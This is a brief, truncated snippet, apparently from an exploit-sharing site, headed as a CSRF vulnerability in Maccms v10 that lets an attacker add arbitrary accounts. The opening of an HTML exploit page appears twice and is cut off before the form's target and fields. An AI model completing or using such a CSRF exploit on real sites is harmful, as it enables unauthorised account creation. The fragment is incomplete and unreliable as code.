Maccms v10 任意账号增加CSRF漏洞
PWNWIK.COM , EXP <html> <body> <script>history.pushState('', '', '/')</script> <form action=" ...
PWNWIK.COM , EXP <html> <body> <script>history.pushState('', '', '/')</script> <form action=" ...